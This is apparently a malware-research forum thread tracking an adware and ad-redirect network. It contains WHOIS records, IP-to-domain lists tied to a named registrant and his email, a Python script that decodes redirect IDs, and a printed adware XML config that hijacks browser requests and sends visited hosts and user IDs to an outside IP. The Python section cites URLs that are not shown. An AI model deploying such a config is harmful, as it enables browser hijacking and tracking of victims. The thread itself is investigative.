fax-no: +31 20 3371802
e-mail: ripe@denit.nl
admin-c: EVER1-RIPE
admin-c: SIMO-RIPE
mnt-ref: DENIT-IS-MNT
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
changed: hostmaster@ripe.net 20040415
changed: bitbucket@ripe.net 20060502
changed: bitbucket@ripe.net 20060502
changed: bitbucket@ripe.net 20060502
changed: bitbucket@ripe.net 20060502
changed: bitbucket@ripe.net 20060508
changed: bitbucket@ripe.net 20070316
changed: bitbucket@ripe.net 20070813
changed: bitbucket@ripe.net 20080125
changed: bitbucket@ripe.net 20080125
source: RIPE

role: DenIT RIPE maintainer role
address: Denit Internet Services BV
address: Contactweg 131
address: 1014 BJ Amsterdam
address: The Netherlands
e-mail: ripe@denit.net
phone: +31 20 3371801
fax-no: +31 20 3371802
notify: ripe@denit.net
admin-c: SIMO-RIPE
tech-c: SIMO-RIPE
nic-hdl: DIT8723-RIPE
mnt-by: DENIT-IS-MNT
remarks: ------------------------------------------
remarks: Send abuse reports to: abuse@denit.net
remarks: Send security reports to: beheer@denit.net
remarks: All other mail to: info@denit.net
remarks: ------------------------------------------
changed: ripe@denit.net 20030103
changed: ripe@denit.net 20031007
source: RIPE

% Information related to '81.93.48.0/20AS25542'

route: 81.93.48.0/20
descr: Denit Networks
origin: AS25542
mnt-by: DENIT-IS-MNT
changed: jsimonetti@denit.net 20070525
source: RIPE
______________________________

Well, right now I need more time to check out all the information found today, fill in the gaps if possible, and I still need to check a couple of IP ranges, so I will post back if anything new shows up.
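The /c/index.php?id= redirects quoted at the top of this post can be unpacked offline: the id value is base64 text with a few junk fragments spliced in, and the decoded query string is ROT13-encoded, which brings back the old u=[date/time stamp]&campaign=[campaign name] shape (an observation made here; the thread itself does not spell it out). The script below is an added example, not code from the thread; it assumes that the fragments m7Nki and YNkiDgNm are junk to strip, an assumption based only on these two samples.

```python
import base64
import codecs
from datetime import datetime, timezone
from urllib.parse import parse_qsl, urlsplit

# Fragments spliced into the id= values quoted in the thread. Treating them
# as junk to strip is an assumption drawn from the two samples only.
JUNK_FRAGMENTS = ("m7Nki", "YNkiDgNm")

# The two redirect URLs quoted in the post, re-joined here with the forum line
# breaks and the stray space after "?" removed (reconstructed sample input).
SAMPLE_URLS = [
    "http://station-appraisals.com/c/index.php?id="
    "WjM0VnExOHBjeDMza0dEUDdnUGRoPTEyMDI4MjE3MjYmcG56Y252dGE9dnFyYWd2c2xm"
    "YgYNkiDgNmYNkiDgNm",
    "http://staticglobalsources.net/c/index.php?id="
    "m7NkiZnRhRDh6RVRudHpXm7NkiZHJsm7NkiZFUwVEloPTEyMDQwNDcyMzImcG56Y252"
    "dGE9bmV0aHpyYWdim7NkiZQYNkiDgNmYNkiDgNm",
]


def strip_junk(blob: str) -> str:
    """Remove the spliced-in fragments so that only base64 text remains."""
    for fragment in JUNK_FRAGMENTS:
        blob = blob.replace(fragment, "")
    return blob


def decode_id(blob: str) -> str:
    """Undo the two layers: base64 (padding restored), then ROT13."""
    clean = strip_junk(blob)
    clean += "=" * (-len(clean) % 4)  # restore the '=' padding that was dropped
    raw = base64.b64decode(clean).decode("ascii")
    # ROT13 leaves digits, '=' and '&' untouched, so the query shape survives.
    return codecs.decode(raw, "rot_13")


def parse_redirect(url: str) -> dict:
    """Return host, token, timestamp and campaign for one /c/index.php?id= URL."""
    parts = urlsplit(url)
    outer = dict(parse_qsl(parts.query))
    inner = decode_id(outer["id"])
    fields = {"host": parts.hostname, "token": None, "timestamp": None, "campaign": None}
    for key, value in parse_qsl(inner):
        if key == "campaign":
            fields["campaign"] = value
        elif value.isdigit():
            # Plays the role of the old u=[date/time stamp] parameter: a Unix time.
            fields["token"], fields["timestamp"] = key, int(value)
    return fields


def timestamp_date(ts: int):
    """Calendar date (UTC) of a Unix timestamp, to line a redirect up with a log."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).date()


if __name__ == "__main__":
    for sample in SAMPLE_URLS:
        info = parse_redirect(sample)
        print(f"{info['host']}: campaign={info['campaign']} "
              f"timestamp={info['timestamp']} ({timestamp_date(info['timestamp'])})")
```

The recovered campaign names (identifyso, argumentor) are exactly the cmpid values of the blessedads.com and waytotheprofit.com hops, so the id= blob ties a banner hit back to its campaign without following the redirect.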
Kimberly
Remember I started with this ...

81.93.56.72 aboutstat.com A
81.93.56.74 newstat.net A
81.93.56.75 officialstat.com A
81.93.56.78 stat-diagnostic-imaging.net A
81.93.56.82 stathisranch.net A
81.93.56.84 staticglobalsources.com A
81.93.56.85 staticglobalsources.net A
81.93.56.86 station-appraisals.com A
81.93.56.87 station-appraisals.net A
81.93.56.88 statnation.net A
81.93.56.91 statsla.net A
Reflex - If you see *.com & *.net mixed, look for their vice versa.

81.93.56.73 - aboutstat.net
81.93.56.76 - officialstat.net
81.93.56.77 - stat-diagnostic-imaging.com
81.93.56.81 - stathisranch.com
Doh, bad luck for newstat.com, statnation.com and statsla.com, Mr. Moon, they are already taken.

Let's fix the IP block overview first ....

81.93.56.72 aboutstat.com
81.93.56.73 aboutstat.net
81.93.56.74 newstat.net
81.93.56.75 officialstat.com
81.93.56.76 officialstat.net
81.93.56.77 stat-diagnostic-imaging.com
81.93.56.78 stat-diagnostic-imaging.net
81.93.56.79 ?
81.93.56.80 ?
81.93.56.81 stathisranch.com
81.93.56.82 stathisranch.net
81.93.56.83 ?
81.93.56.84 staticglobalsources.com
81.93.56.85 staticglobalsources.net
81.93.56.86 station-appraisals.com
81.93.56.87 station-appraisals.net
81.93.56.88 statnation.net
81.93.56.89 ?
81.93.56.90 ?
81.93.56.91 statsla.net
5 IPs left, 5 gaps to fill.

Stay tuned ... it's not gonna take me long to dig up the remaining stuff if possible.
Kimberly
Let's examine important info (outlined in red below).

Domain Name: STATION-APPRAISALS.COM
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Whois Server: whois.communigal.net
Referral URL: http://www.galcomm.com
Name Server: NS1.STATION-APPRAISALS.COM
Name Server: NS2.STATION-APPRAISALS.COM
Status: ok
Updated Date: 04-feb-2008
Creation Date: 01-feb-2008
Expiration Date: 01-feb-2009
There were 25 new domains for COMMUNIGAL.NET on 02/01/2008
  1. ABOUTSTAT.COM
  2. ABOUTSTAT.NET
  3. NEWSTAT.NET
  4. NIMOONLINE.COM
  5. NIMOONLINE.NET
  6. NIMOREX.COM
  7. NIMOREX.NET
  8. OFFICIALSTAT.COM
  9. OFFICIALSTAT.NET
  10. STAT-DIAGNOSTIC-IMAGING.COM
  11. STAT-DIAGNOSTIC-IMAGING.NET
  12. STATETSTR.COM
  13. STATGROUP.NET
  14. STATHISRANCH.COM
  15. STATHISRANCH.NET
  16. STATHOME.NET
  17. STATICGLOBALSOURCES.COM
  18. STATICGLOBALSOURCES.NET
  19. STATION-APPRAISALS.COM
  20. STATION-APPRAISALS.NET
  21. STATNATION.NET
  22. STATSITE.NET
  23. STATSLA.NET
  24. STATUAS.NET
  25. STATWORLD.NET

Which gives us the following additional domains belonging to Serg Moon.
  • 81.93.56.79 statetstr.com
  • 81.93.56.80 statgroup.net
  • 81.93.56.83 stathome.net
  • 81.93.56.88 statsite.net
  • 81.93.56.92 statuas.net
Overview.
  1. 81.93.56.72 aboutstat.com
  2. 81.93.56.73 aboutstat.net
  3. 81.93.56.74 newstat.net
  4. 81.93.56.75 officialstat.com
  5. 81.93.56.76 officialstat.net
  6. 81.93.56.77 stat-diagnostic-imaging.com
  7. 81.93.56.78 stat-diagnostic-imaging.net
  8. 81.93.56.79 statetstr.com
  9. 81.93.56.80 statgroup.net
  10. 81.93.56.81 stathisranch.com
  11. 81.93.56.82 stathisranch.net
  12. 81.93.56.83 stathome.net
  13. 81.93.56.84 staticglobalsources.com
  14. 81.93.56.85 staticglobalsources.net
  15. 81.93.56.86 station-appraisals.com
  16. 81.93.56.87 station-appraisals.net
  17. 81.93.56.88 statnation.net
  18. 81.93.56.88 statsite.net
  19. 81.93.56.91 statsla.net
  20. 81.93.56.92 statuas.net
  21. 81.93.55.178 statworld.net
"Serg Moon" owns about 19 other domains.... wink.gif

Remaining.
  • 81.93.56.89 ?
  • 81.93.56.90 ?
To keep an eye on.
  • 81.93.55.176
  • 81.93.55.177
  • 81.93.55.179
  • 81.93.55.180
  • 81.93.55.181
  • 81.93.55.182
  • 81.93.55.183
moon.serg@gmail.com is associated with about 28 domains....
Kimberly
Ready for another journey in advert land?

Yesterday evening Malekal_morte asked me if I knew what was creating xml files on a victim's computer. In the meantime he grabbed a copy of an xml file. Kudos for doing that.

My curiosity immediately got piqued after seeing the following:

CODE
<frameset>
<frame src="http://luckyadsols.com/?rotationid=start404&gai=4043&gli={URL}&gff=4042&uid={UID}&guid={GUID}&aid={AID}">
</frameset>

luckyadsols.com shares the same IP as waytotheprofit.com, blessedads.com, prevedmarketing.com as seen earlier.
Other interesting elements present in the xml file are:
  • CAMPAIGN name=[name] id=[number] - there are 4 of them
  • 83.149.105.113
  • 91.184.6.104
  • pagead2\.googlesyndication\.com
  • ahahoo.com
Full code below; I just scrambled the encrypted IP. A screenshot is available here because the code is easier to follow.

CODE
<ROOT>
  <CAMPAIGNLIST>
    <CAMPAIGN name="lsd-89" id="1224201">
      <actions>
        <action type="Request">
          <newvalue>
            <![CDATA[ GET /?t={HEADER(Host)}&aid={AID}&uid={UID}&guid={GUID} HTTP/1.1
            ]]>
          </newvalue>
        </action>
        <action type="AddRequestHeader">
          <newvalue>
            <![CDATA[ Host: 83.149.105.113:80
            ]]>
          </newvalue>
        </action>
      </actions>
      <rules>
        <rule type="UrlKeywords">
          <![CDATA[ ^(http://)?(www(\.))?[a-zA-Z0-9,\-,\,]*\.[a-zA-Z0-9,\-,\,]*/$
          ]]>
        </rule>
        <rule type="ServerCheck">
          <![CDATA[ http://83.149.105.113:80/?t={HEADER(Host)}&aid={AID}&uid={UID}&guid={GUID}
          ]]